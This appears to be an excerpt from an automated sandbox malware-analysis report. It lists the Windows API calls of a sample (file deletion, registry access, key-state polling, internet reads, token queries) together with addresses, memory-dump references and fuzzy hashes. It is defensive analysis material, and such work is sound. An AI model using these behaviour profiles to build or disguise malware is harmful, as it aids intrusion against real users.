                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                              • API String ID: 145871493-1355242751
                                                                                                                                                                              • Opcode ID: 81f8869727003be22c7df4ed310266a659e3de75f087e2b1292d952f14313b3b
                                                                                                                                                                              • Instruction ID: 413539ed4f8f1f0ad63d051dda2ad1a26bed05691d86206d2d6996a286fd2523
                                                                                                                                                                              • Opcode Fuzzy Hash: 81f8869727003be22c7df4ed310266a659e3de75f087e2b1292d952f14313b3b
                                                                                                                                                                              • Instruction Fuzzy Hash: E5D01736617A36AB42222B26BC1CACE6F14AF93F6130D0065B801B2164CF68CD05C6E8
                                                                                                                                                                              APIs
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E135C4
                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00E13646
                                                                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E1365C
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E1366D
                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E1367F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Delete$Copy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3226157194-0
                                                                                                                                                                              • Opcode ID: ecc87bd5382ea0328a88e53f4d150f82b8c513fc69ebb4b2597fc99d81519ce0
                                                                                                                                                                              • Instruction ID: 32d84bde541ed4f891e5160e96d5f758ae65e3dc1996501a63438344c7f398a2
                                                                                                                                                                              • Opcode Fuzzy Hash: ecc87bd5382ea0328a88e53f4d150f82b8c513fc69ebb4b2597fc99d81519ce0
                                                                                                                                                                              • Instruction Fuzzy Hash: B4B14D72A00119ABDF11DBA4CC85EDEBBBDEF49314F1040AAF609B7151EB349B848B71
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00E2AE87
                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E2AE95
                                                                                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E2AEC8
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00E2B09D
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
APIs
  • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
  • Part of subcall function 00E2D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E2C10E,?,?), ref: 00E2D415
  • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D451
  • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4C8
  • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E2C505
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E2C560
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E2C5C3
• RegCloseKey.ADVAPI32(?,?), ref: 00E2C606
• RegCloseKey.ADVAPI32(00000000), ref: 00E2C613
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
APIs
  • Part of subcall function 00E0E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E0D7CD,?), ref: 00E0E714
  • Part of subcall function 00E0E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E0D7CD,?), ref: 00E0E72D
  • Part of subcall function 00E0EAB0: GetFileAttributesW.KERNEL32(?,00E0D840), ref: 00E0EAB1
• lstrcmpiW.KERNEL32(?,?), ref: 00E0ED8A
• MoveFileW.KERNEL32(?,?), ref: 00E0EDC3
• _wcslen.LIBCMT ref: 00E0EF02
• _wcslen.LIBCMT ref: 00E0EF1A
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00E0EF67
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
APIs
• VariantInit.OLEAUT32(?), ref: 00E09534
• VariantClear.OLEAUT32 ref: 00E095A5
• VariantClear.OLEAUT32 ref: 00E09604
• VariantClear.OLEAUT32(?), ref: 00E09677
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E096A2
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E195F3
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00E1961F
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E19677
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E1969C
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E196A4
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 00E2999D
• GetProcAddress.KERNEL32(00000000,?), ref: 00E29A2D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00E29A49
• GetProcAddress.KERNEL32(00000000,?), ref: 00E29A8F
• FreeLibrary.KERNEL32(00000000), ref: 00E29AAF
  • Part of subcall function 00DBF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00E11A02,?,7529E610), ref: 00DBF9F1
  • Part of subcall function 00DBF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00E00354,00000000,00000000,?,?,00E11A02,?,7529E610,?,00E00354), ref: 00DBFA18
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
• String ID:
• API String ID: 666041331-0
                                                                                                                                                                              • Opcode ID: 2c2cd853e2992d52b91c9e73ccea7438d4a2b49a2edc7b54414476c299e1ba40
                                                                                                                                                                              • Instruction ID: 446cfcaddc53830f7cd2087cc6ef3725284ce35be71ba0cee2ac5e2bf058e654
                                                                                                                                                                              • Opcode Fuzzy Hash: 2c2cd853e2992d52b91c9e73ccea7438d4a2b49a2edc7b54414476c299e1ba40
                                                                                                                                                                              • Instruction Fuzzy Hash: 26514D75604215DFCB10DF68D485999BBF0FF09324B04A099E84AAB762D731ED85CFA1
APIs
• SetWindowLongW.USER32(00000002,000000F0,?), ref: 00E3766B
• SetWindowLongW.USER32(?,000000EC,?), ref: 00E37682
• SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00E376AB
• ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00E1B5BE,00000000,00000000), ref: 00E376D0
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00E376FF
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Window$Long$MessageSendShow
• String ID:
• API String ID: 3688381893-0
• Opcode ID: b429acaa2576cef656fa0ea724dac152841a0a8b910612a351ea19164e2eb5a5
• Instruction ID: 4b98f930598076559e563821771a19fb9796c76832f60e87000d5b772082bc09
• Opcode Fuzzy Hash: b429acaa2576cef656fa0ea724dac152841a0a8b910612a351ea19164e2eb5a5
• Instruction Fuzzy Hash: 834100B4A08504AFD735CF2CCC6EFA67FA5EB49364F151264F988B72E0C270AD40DA50
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: f23771d00f910a44e6e270bd67804ef3c5f5449f103d88cdb327fbf28ff10f39
• Instruction ID: cd7fa38ccf39d576baf1ccff31c00317dbb4475da2c3844ab34c471d407bf378
• Opcode Fuzzy Hash: f23771d00f910a44e6e270bd67804ef3c5f5449f103d88cdb327fbf28ff10f39
• Instruction Fuzzy Hash: 1741A432A002009FDB24DF78C881A6AB7E6EF99314F15456AE915EB355D631ED01CBA0
APIs
• GetCursorPos.USER32(?), ref: 00DA19E1
• ScreenToClient.USER32(00000000,?), ref: 00DA19FE
• GetAsyncKeyState.USER32(00000001), ref: 00DA1A23
• GetAsyncKeyState.USER32(00000002), ref: 00DA1A3D
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 47cb306b2c48b8eb3d62c0f75e31ac95e09c139848ff4ff08377503bbce08220
• Instruction ID: 81f4f4c985db6e305c9d13b2f68eae475d75eb080891e5ef2dc038a22c70f86b
• Opcode Fuzzy Hash: 47cb306b2c48b8eb3d62c0f75e31ac95e09c139848ff4ff08377503bbce08220
• Instruction Fuzzy Hash: E8415F75A0424AFFDF15AF65C848BFEBB74FB05324F24831AE469A3290C7309A55CB61
APIs
• GetWindowRect.USER32(?,?), ref: 00E02262
• PostMessageW.USER32(00000001,00000201,00000001), ref: 00E0230E
• Sleep.KERNEL32(00000000,?,?,?), ref: 00E02316
• PostMessageW.USER32(00000001,00000202,00000000), ref: 00E02327
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 00E0232F
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: 41efdd69568d295dfc33117fbc1dbb1646fbdaed5e1626186bf424ec84a30f4a
• Instruction ID: ffa579a5239fa7af1dcf22f304b4f914e4f0ba6b13c36fe21af98d3bdb68904f
• Opcode Fuzzy Hash: 41efdd69568d295dfc33117fbc1dbb1646fbdaed5e1626186bf424ec84a30f4a
• Instruction Fuzzy Hash: 5931B171900219EFDB14CFA8DD8DADE7BB5EB04319F104229FA25BB2E0C7709984DB91
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00E1CC63,00000000), ref: 00E1D97D
• InternetReadFile.WININET(?,00000000,?,?), ref: 00E1D9B4
• GetLastError.KERNEL32(?,00000000,?,?,?,00E1CC63,00000000), ref: 00E1D9F9
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00E1CC63,00000000), ref: 00E1DA0D
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00E1CC63,00000000), ref: 00E1DA37
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 3191363074-0
• Opcode ID: 17db87f0ac636c8c277f27380e051b5301fe21f5e83c80fc3444d75889406221
• Instruction ID: 2d7d21a0fa2f719da1a385d37d48f79ab1bfcb6cdffd4d26358a679e46a79c20
• Opcode Fuzzy Hash: 17db87f0ac636c8c277f27380e051b5301fe21f5e83c80fc3444d75889406221
• Instruction Fuzzy Hash: 50314B71508205EFDB24DFA6DC84AEBBBF8EF44354B10942EF546E3150D770AE849B60
APIs
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E361E4
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00E3623C
• _wcslen.LIBCMT ref: 00E3624E
• _wcslen.LIBCMT ref: 00E36259
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00E362B5
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: MessageSend$_wcslen
• String ID:
• API String ID: 763830540-0
• Opcode ID: a93f8b42ebd94b05a72e9e239d9118bfdeba4d378dd8d4f47c5f79e2bb6e35a2
• Instruction ID: 40b4950e549e9d2815a4a1aec0bbbe596e5df41e73418d249424513ce3354f6c
• Opcode Fuzzy Hash: a93f8b42ebd94b05a72e9e239d9118bfdeba4d378dd8d4f47c5f79e2bb6e35a2
• Instruction Fuzzy Hash: 1A218571904218AADB119F65DC88EEE7FB8EF44314F14921AF925FB290D7709985CF60
APIs
• IsWindow.USER32(00000000), ref: 00E213AE
• GetForegroundWindow.USER32 ref: 00E213C5
• GetDC.USER32(00000000), ref: 00E21401
• GetPixel.GDI32(00000000,?,00000003), ref: 00E2140D
• ReleaseDC.USER32(00000000,00000003), ref: 00E21445
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: bea9d72db4554a5fbbd9a1c7b71968a6a6c9a9fabc5047fa1919f60c719f66a0
• Instruction ID: 6aceb1fab723f92bb87569e86d57d3b89881cfa0cb33f9553110a93aa574618c
• Opcode Fuzzy Hash: bea9d72db4554a5fbbd9a1c7b71968a6a6c9a9fabc5047fa1919f60c719f66a0
• Instruction Fuzzy Hash: FD21AE36600218AFDB04EF65DC89A9EBBF5EF48300B058479F85AE7351CA30AD44CBA0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00DDD146
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DDD169
  • Part of subcall function 00DD3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DC6A79,?,0000015D,?,?,?,?,00DC85B0,000000FF,00000000,?,?), ref: 00DD3BC5
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00DDD18F
• _free.LIBCMT ref: 00DDD1A2
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DDD1B1
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 9b0e0bd07e1630fc0b5e24675c6299d9ef1d1f372dc14bc6dceff251d48b72b6
• Instruction ID: e1f65cedf2386e133b1eca421b697d9ae8e3540ab2e59c0b258ce2faf9be6658
• Opcode Fuzzy Hash: 9b0e0bd07e1630fc0b5e24675c6299d9ef1d1f372dc14bc6dceff251d48b72b6
• Instruction Fuzzy Hash: B30171766067197F2B316AAAAC8CD7B7A6FDFC2B61319012BF904D6344DA608D0681B1
APIs
• GetLastError.KERNEL32(0000000A,?,?,00DCF64E,00DC545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00DD3170
• _free.LIBCMT ref: 00DD31A5
• _free.LIBCMT ref: 00DD31CC
• SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00DD31D9
• SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00DD31E2
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: a7ca638b393a633e0139715b549d9c3305170b16d1ada3993c7c81c7bb433e81
• Instruction ID: 7568bd8f5de06581082f67ec04e5b72d14192a26240bc8a9365c68456b67b24c
• Opcode Fuzzy Hash: a7ca638b393a633e0139715b549d9c3305170b16d1ada3993c7c81c7bb433e81
• Instruction Fuzzy Hash: 6F01F9726497022F96122776BC49D6B1569DFD13713240427F815B2391EE61CF0A4272
APIs
• CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?,?,?,00E00C4E), ref: 00E0091B
• ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?,?), ref: 00E00936
• lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?,?), ref: 00E00944
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?), ref: 00E00954
• CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E00831,80070057,?,?), ref: 00E00960
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
• Opcode ID: 97147ca13a1ba6dedb4f6a737444c308532365dca41ae3d957eea3525d843167
• Instruction ID: 9cdf8cae00f542631577de9e4ff119c0e379e842768b8be9e132cf87f387b4a1
• Opcode Fuzzy Hash: 97147ca13a1ba6dedb4f6a737444c308532365dca41ae3d957eea3525d843167
• Instruction Fuzzy Hash: BA018F76604209AFEB154F56EC48B9A7EBDEBC4752F140124F905F2251DB71DD809BA0
APIs
• QueryPerformanceCounter.KERNEL32(?), ref: 00E0F2AE
• QueryPerformanceFrequency.KERNEL32(?), ref: 00E0F2BC
• Sleep.KERNEL32(00000000), ref: 00E0F2C4
• QueryPerformanceCounter.KERNEL32(?), ref: 00E0F2CE
• Sleep.KERNEL32 ref: 00E0F30A
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: d59ff5e7577e0222adfd2bec56986bbb7cc994f0000dfccabde1925997ab59c7
• Instruction ID: 843e85ba5a972b75bf6e676b0956bea1f2b2e976f480bae1c1f8416c2baed9aa
• Opcode Fuzzy Hash: d59ff5e7577e0222adfd2bec56986bbb7cc994f0000dfccabde1925997ab59c7
• Instruction Fuzzy Hash: 49015771C0661DDBCF14AFE5EC4DAEEBB78FB08721F001466E541B2290DB3495A8C7A1
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E01A60
• GetLastError.KERNEL32(?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A6C
• GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A7B
• HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A82
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E01A99
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
• Opcode ID: 43f81ba7a8934e5cf10bfcf34ebc85439010727d8d65c3906ae3b9106c36321b
                                                                                                                                                                              • Instruction ID: 78152d4d7b3a6dbe2c5d3ce688e2fc5f875a2a165722ca7cb80fdf677615a1df
                                                                                                                                                                              • Opcode Fuzzy Hash: 43f81ba7a8934e5cf10bfcf34ebc85439010727d8d65c3906ae3b9106c36321b
                                                                                                                                                                              • Instruction Fuzzy Hash: 3C018CB9601209BFDB114FA6EC4DE6A3F7EEF883A4B210454F845E72A0DB31DC508A60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E01976
